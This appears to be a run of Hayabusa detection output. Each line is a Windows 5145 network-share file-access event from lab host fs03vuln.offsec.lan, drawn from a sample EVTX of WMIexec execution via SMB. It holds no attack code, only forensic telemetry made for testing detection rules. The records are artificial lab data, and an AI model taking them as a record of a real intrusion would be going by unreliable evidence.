+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
